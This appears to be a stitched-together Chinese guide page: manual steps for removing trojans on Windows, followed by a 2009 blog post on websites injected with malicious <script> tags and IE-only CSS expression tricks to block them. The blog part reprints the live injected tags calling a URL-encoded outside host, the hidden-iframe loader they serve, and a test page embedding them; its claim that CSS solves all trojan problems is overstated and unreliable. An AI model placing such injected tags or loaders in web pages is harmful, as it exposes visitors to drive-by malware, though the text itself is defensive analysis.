最简单的系统木马病毒解决方法

合集下载
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

最简单的系统木马病毒解决方法
系统中木马病毒后该怎么办?下面我们介绍一些简单的解决方法。

1.打开windows任务管理器,察看是否有可疑的进程(可以根据杀毒软件的报告或者在网上搜索相关信息来判定)在运行,如果有把它结束。

注意在system32目录下的Rundll3
2.exe 本身不是病毒,有可能一个dll文件在运行,他才可能是病毒或恶意程序之类的东西。

由于windows 任务管理器不能显示进程的路径,因此建议使用杀毒软件自带的进程察看和管理工具来查找并中止可疑进程。

然后设法找到病毒程序文件(主要是你所中止的病毒进程文件,另外先在资源管理器的文件夹选项中,设置显示所有文件和文件夹、显示受保护的文件,再察看如system32文件夹中是否有不明dll或exe文件,C:\Program Files、C:\Documents and Settings\user\Local Settings\Temporary Internet Files、C:\Documents and Settings\user\Local Settings\Temp等处是否有不明文件或病毒程序文件),然后删去,搞清楚是否是系统文件再动手。

2.有些病毒进程终止不了,提示“拒绝访问”,或者出现“屡禁不止”的情况。

根据我的经验,有三种办法供尝试:
A.可能是某些木马病毒、流氓软件等注册为系统服务了。

办法是:察看控制面板〉管理工具〉服务,看有没有与之相关的服务(特别是“描述”为空的)在运行,把它停止。

再试著中止病毒进程并删除。

B.你可以尝试安全模式下(开机后按F8选安全模式)用杀毒软件处理,不行则再按步骤1和2A试一试。

C.使用冰刃等工具,察看病毒进程的线程信息和模块信息,尝试结束线程和解除模块,再试著删除病毒进程文件和相应的模块。

(慎用)
3.如果稍微懂得注册表使用的,可以再把相关的注册表键值删除。

一般方法:开始〉运行,输入regedit,确定,打开注册表编辑器。

编辑〉查找,查找目标为病毒进程名,在搜索结果中将与之有关的键值删除。

有时这样做不能遏止病毒,还应尝试使用步骤2中方法。

4.某些病毒会劫持IE浏览器,导致乱弹网页的状况。

建议用360安全卫士,看浏览器辅助对象BHO是否有可疑项目,有没有没恶意插件或者木马。

有就修复它。

5.其他提示:为了更好的操作,请先用优化大师或超级兔子清理所有临时文件和上网时的缓存文件。

一般病毒往往在临时文件夹Temp中,这样做可以帮你更快找到病毒文件。

开始>>运行,输入msconfig,确定,可以打开“系统配置实用程序”。

选择“启动”,察看开机时加载的程序,如果在其中发现病毒程序,可以禁止它在开机时加载。

不过此法治标不治本,甚至对某些程序来说无效。

还是要按步骤1、2办。

2009-03-06 17:01
网站被挂木马解决方法
参考网站:/viewthread.php?tid=428347
还是挂马问题,这段时间,我渐渐感到压力,头大,通过QQ或MSN加我的人越来越多,我最近自己的工作本来就忙得不亦乐乎。

哎,想想,还是要抽空来来帮一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)》得到了很多朋友的认可,这确实是个避避风雨的好办法。

可现在挂网马的方式真如我所料地改变了,现在流行挂<script>木马,汗了,看了几个网友的网站都被这样了——页面的顶部或底部加上了:
注意,以下地址含有木马,请不要轻易访问:
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
汗死,一连插入了N个一样的<script>标记。

偶的电脑什么补丁都打了,直接访问这个http://%76%63%63%64%2E%63%6E(或直接使用迅雷下载),额~ 现形了:
document.write("<div style='display:none'>")
document.write("<iframe src=/b1.htm?id=017 width=0 height=0></iframe>")
document.write("</div>")
又用迅雷下载/b1.htm这个文件,一看,乱七八糟的JS编码,汗,不过找到了一个类似QQ号的数字,直接加加看,汗,然后是专业提供网马的组织,哎,什么世道。

还收费蛮高滴呢!
...
var Kfqq, Qqs="[color=Magenta]784378237[/color]";
qwfgsg="LLLL\\XXXXXLD"; Kfqq = Qqs;
(...略)(下面还有N个统计的JS代码)
针对上面的情况,我也不能白白瞧着不管,想想办法吧,兄弟。

喝了碗绿豆粥,糖放得蛮多的,好喝。

办法想到了。

稍微分析就得出了答案。

大家来看看,<script>木马的特点是什么:
<script src=http://%76%63%63%64%2E%63%6E></script>
对了,script木马的src一般都是外域的,也就是src是以http打头的,如果是自己网站的script一般都不用加上http;再看看木马的原形,里面还是输出的iframe、JS代码或是其他<object>代码,不管这么多,来多少杀多少。

来跟我写CSS,一一搞定它们,我写了5种不同的方案,大家来测试一下哈:
解决方案1:
iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*这行代码是解决挂IFRAME木马的哦*/
script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?d ocument.write('木马被成功隔离!'):'');}
原理:将<script>标记的src拿出来转为小写,再看是不是以“http”开头的外域JS脚本文件,如果是,则页面内容清空并写出“木马被成功隔离!”。

反之正常显示。

缺点:访客无法看到被感染了<script>木马的页面。

解决方案2:
iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');} script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?d ocument.close():'');}
原理:将外域的JS文件的document.write()使用document.close()强制关闭。

木马内容还没有来得及写完,只有部分被强制缓存输出了,剩下的不会再写了。

解决方案3:
iframe{ni3fm:expression(this.src='about:blank',this.outerHTML='');} script{n3ojs:expression((this.src.toLowerCase().indexOf('http')==0)?d ocument.execCommand('stop'):'');}
原理:同到外域的JS文件,立即调用IE私有的execCommand方法来停止页面所有请求,所以接下来的外域JS文件也被强制停止下载了。

就像我们点了浏览器的“停止”按钮一样。

看来这是JS模拟IE停止按钮的一种方法。

解决方案4:
iframe{nif4m:expression(this.src='about:blank',this.outerHTML='');} script{noj4s:expression(if(this.src.indexOf('http')==0)this.src='res: //ieframe.dll/dnserror.htm');}
原理:将外域的JS文件的src重写成本地IE404错误页面的地址,这样,外域的JS代码不会下载。

解决方案5:
iframe{nifm5:expression(this.src='about:blank',this.outerHTML='');} script{noj5s:expression((this.id.toLowerCase().indexOf('vok')!=-1)?do cument.write('木马被成功隔离!'):''));}
第五种方案的页面HTML源代码<script>中要加入以"lh"为前缀的id,如lhWeatherJSapi,<script src="***/**.js" id="lhSearchJSapi"></script>
以下页面代码里含有一个木马地址,而且木马在页面里重复了6次,大家分别用我上面的不同方案测试一下,看看我的研究如何!(此测试有一定的危险性,请务必打好所有补丁再测试)电影王国
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>让JS木马的进程迅速中止的CSS代码</title>
<style type="text/css" id="LinrStudio">
/*<![CDATA[*/
iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');} script{ngz1:expression((this.src.indexOf('http')==0)?document.close() :'');}
/* 以后请在此关注最新木马处理方法:/ff/api.htm */ /*]]>*/
</style>
</head>
<body>
<script type="text/javascript" src="1.js"></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src="http://%76%63%63%64%2E%63%6E"
type="text/javascript"></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
我是页面本身的1
<script src=http://%76%63%63%64%2E%63%6E></script>
我是页面本身的2
<script src=http://%76%63%63%64%2E%63%6E></script>
我是页面本身的3
<script src=http://%76%63%63%64%2E%63%6E></script>
</body>
</html>
其中1.js是自己本站的:
document.write("我是本站的JS文件");
document.write("<img src='/images/logo.gif' />"); 我的测试环境是:
Windows XP SP2 和windows Vista SP1
IE6/IE7/IE8
已全部打好补丁。

综上所述,所有目前的挂马方式全都破解了,用CSS就可以解决所有木马问题,访客不会再轻易地中毒了。

以后也要再仔细研究一下,看看我的代码有什么BUG,有的话一定要解决问题!
6.说了这么多,不过有时还是不能解决。

只好请教高人或格式化重做系统了,当然不推荐后者。

相关文档
最新文档